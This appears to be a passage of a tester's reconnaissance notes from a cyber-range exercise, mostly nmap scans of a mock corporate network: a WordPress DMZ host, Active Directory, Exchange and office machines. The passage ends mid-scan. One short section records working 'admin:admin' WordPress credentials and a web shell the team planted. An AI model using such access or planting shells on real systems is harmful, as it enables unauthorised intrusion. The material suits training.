# Buffer
## ips
Name |IP
:-:|:-:
DMZ |10.11.2.0/24
SERVERS | 10.11.3.0/24
OFFICE |10.11.4.0/24
ASU_TP1 |10.11.239.0/24
ASU_TP1|10.11.240.0/24
## ips new
**10.11.2.0:**
Name |IP
:-:|:-:
WordPress |[10.11.2.10](http://10.11.2.10/)
Atrium | [10.11.2.11](http://10.11.2.11/)
SLmail |10.11.2.12
DNS |10.11.2.53
**10.11.3.0:**
Name |IP
:-:|:-:
Active Directory (?) | 10.11.3.10
mx1.company.local | 10.11.3.20
Active Directory (?) | 10.11.3.50
**10.11.4.0:**
Name | IP
:-:|:-:
custarm.company.local | 10.11.4.6
?? (Windows) |10.11.4.8
Microsoft Terminal Services (?) |10.11.4.10
Forgot | 10.11.4.13
**10.11.239.0:**
Name | IP
:-:|:-:
Web + Microsoft SQL Server | 10.11.239.5
?? (Windows) | 10.11.239.6
**10.11.240.0:**
Name | IP
:-:|:-:
Web (JBoss) | 10.11.240.5
Web (JBoss) | 10.11.240.6
Web (JBoss) | 10.11.240.9
Web (JBoss) | 10.11.240.10
?? (Windows) | 10.11.240.14
## 10.11.2.0
### nmap
```bash
nmap 10.11.2.10-12,53 -sV
Host is up (0.0029s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http nginx 1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.11
Host is up (0.0028s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: CLEAN-DRUPAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.12
Host is up (0.0037s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
25/tcp open smtp SLmail smtpd 5.5.0.4433
79/tcp open finger SLMail fingerd
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: elto-slmail; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.2.53
Host is up (0.0041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```bash
nmap 10.11.2.10-12,53 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:39 MSK
Nmap scan report for 10.11.2.10
Host is up (0.0044s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5a:e2:71:5e:bf:f5:f3:22:de:e1:3a:0d:c5:8d:00:24 (RSA)
| 256 05:bc:61:56:22:41:81:35:aa:b0:40:16:0c:47:fe:0e (ECDSA)
|_ 256 5e:fe:5a:ad:5d:9e:08:58:09:21:f2:db:97:5d:8d:c9 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.9.2
|_http-title: work – Just another WordPress site
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.11
Host is up (0.0042s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 87:7e:d3:a9:f1:17:1b:2d:74:85:e0:c9:b0:22:c6:a3 (DSA)
| 2048 61:04:d9:37:2a:d8:5f:ac:51:ec:c0:64:c4:20:bd:f4 (RSA)
|_ 256 cb:b6:01:57:7a:42:da:50:24:06:43:09:b9:3c:e8:cb (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.10 (Debian)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: CyberPolygon
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)
Service Info: Host: ELTO-PORTAL2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: ELTO-PORTAL2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.0:
|_ Message signing enabled but not required
|_clock-skew: mean: -6s, deviation: 0s, median: -7s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.2.14-Debian)
| Computer name: \x00
| NetBIOS computer name: ELTO-PORTAL2\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T07:40:54+00:00
Nmap scan report for 10.11.2.12
Host is up (0.0047s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
25/tcp open smtp SLmail smtpd 5.5.0.4433
| smtp-commands: elto-slmail, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp open finger SLMail fingerd
|_finger: Finger online user list request denied.\x0D
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T07:41:13+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: ELTO-SLMAIL
| NetBIOS_Domain_Name: ELTO-SLMAIL
| NetBIOS_Computer_Name: ELTO-SLMAIL
| DNS_Domain_Name: elto-slmail
| DNS_Computer_Name: elto-slmail
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T07:41:01+00:00
| ssl-cert: Subject: commonName=elto-slmail
| Not valid before: 2022-02-17T05:46:48
|_Not valid after: 2022-08-19T05:46:48
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: elto-slmail; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:41:01
|_ start_date: 2022-02-18T14:12:01
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: elto-slmail
| NetBIOS computer name: ELTO-SLMAIL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T10:41:01+03:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ELTO-SLMAIL, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:90:76:1c (unknown)
Nmap scan report for 10.11.2.53
Host is up (0.0041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 62:10:fe:e0:81:28:b2:3c:84:b7:4b:69:6c:ec:6c:04 (RSA)
| 256 a9:06:0f:94:5f:77:6b:50:f1:49:5b:0f:7a:6b:b5:6b (ECDSA)
|_ 256 b6:7d:84:d7:5e:81:9e:cc:0a:e5:f1:3a:e9:45:84:40 (ED25519)
53/tcp open domain ISC BIND
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 96.96 seconds
```
### .10 (WordPress)
http://10.11.2.10/wp-login.php
admin:admin
http://10.11.2.10/shell.php - we put it up ourselves
### .11
```bash
nmap -A 10.11.2.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:53 MSK
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.11.2.11
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 87:7e:d3:a9:f1:17:1b:2d:74:85:e0:c9:b0:22:c6:a3 (DSA)
| 2048 61:04:d9:37:2a:d8:5f:ac:51:ec:c0:64:c4:20:bd:f4 (RSA)
|_ 256 cb:b6:01:57:7a:42:da:50:24:06:43:09:b9:3c:e8:cb (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: CyberPolygon
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)
Service Info: Host: CLEAN-DRUPAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1m04s, deviation: 0s, median: -1m04s
| smb2-security-mode:
| 3.0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: CLEAN-DRUPAL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-10T06:52:33
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.2.14-Debian)
| Computer name: \x00
| NetBIOS computer name: CLEAN-DRUPAL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-10T06:52:33+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
```
### buf
## 10.11.3.0
### nmap
```bash
nmap 10.11.3.10,20,50 -sV
Nmap scan report for 10.11.3.10
Host is up (0.0054s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-10 05:55:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: NS2; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.3.20
Host is up (0.0036s latency).
Not shown: 973 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 Microsoft Exchange 2007-2010 pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
444/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
587/tcp open smtp Microsoft Exchange smtpd
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
995/tcp open ssl/pop3 Microsoft Exchange 2007-2010 pop3d
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2525/tcp open smtp Microsoft Exchange smtpd
3389/tcp open ms-wbt-server Microsoft Terminal Services
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6007/tcp open msrpc Microsoft Windows RPC
6123/tcp open msrpc Microsoft Windows RPC
6543/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mx1.company.local; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.3.50
Host is up (0.0041s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-10 05:55:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: NS1; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 7 IP addresses (7 hosts up) scanned in 66.04 seconds
```
```bash
nmap 10.11.3.10,20,50 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:43 MSK
Nmap scan report for 10.11.3.10
Host is up (0.74s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-11 07:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:45:24+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: NS2
| DNS_Domain_Name: company.local
| DNS_Computer_Name: ns2.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:01+00:00
| ssl-cert: Subject: commonName=ns2.company.local
| Not valid before: 2022-02-17T12:44:25
|_Not valid after: 2022-08-19T12:44:25
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: NS2; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:45:07
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Nmap scan report for 10.11.3.20
Host is up (0.0017s latency).
Not shown: 973 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 Microsoft Exchange 2007-2010 pop3d
|_pop3-capabilities: TOP STLS UIDL
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-title: Outlook
|_Requested resource was https://10.11.3.20/owa/auth/logon.aspx?url=https%3a%2f%2f10.11.3.20%2fowa%2f&reason=0
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_http-server-header: Microsoft-IIS/10.0
444/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_http-title: Runtime Error
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
995/tcp open ssl/pop3 Microsoft Exchange 2007-2010 pop3d
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_pop3-capabilities: TOP SASL(PLAIN) USER UIDL
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:06+00:00
| ssl-cert: Subject: commonName=mx1.company.local
| Not valid before: 2022-02-17T12:50:03
|_Not valid after: 2022-08-19T12:50:03
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6007/tcp open msrpc Microsoft Windows RPC
6123/tcp open msrpc Microsoft Windows RPC
6543/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mx1.company.local; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-03-11T07:45:08
|_ start_date: N/A
Nmap scan report for 10.11.3.50
Host is up (0.0072s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-11 07:44:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:45:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ns1.company.local
| Not valid before: 2022-02-17T12:30:36
|_Not valid after: 2022-08-19T12:30:36
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: NS1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: ns1.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:04+00:00
Service Info: Host: NS1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-03-11T07:45:13
|_ start_date: N/A
Post-scan script results:
| clock-skew:
| 0s:
| 10.11.3.20
| 10.11.3.10
|_ 10.11.3.50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 91.36 seconds
```
### buf
## 10.11.4.0
### nmap
```bash
nmap 10.11.4.6,8,10,13 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:06 MSK
Nmap scan report for 10.11.4.6
Host is up (0.0022s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.8
Host is up (0.0021s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BUCHGARM; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.10
Host is up (0.66s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.13
Host is up (0.0036s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 81.60 seconds
```
```bash
nmap 10.11.4.6,8,10,13 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:48 MSK
Nmap scan report for 10.11.4.6
Host is up (0.012s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: CUSTARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: custarm.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:21+00:00
| ssl-cert: Subject: commonName=custarm.company.local
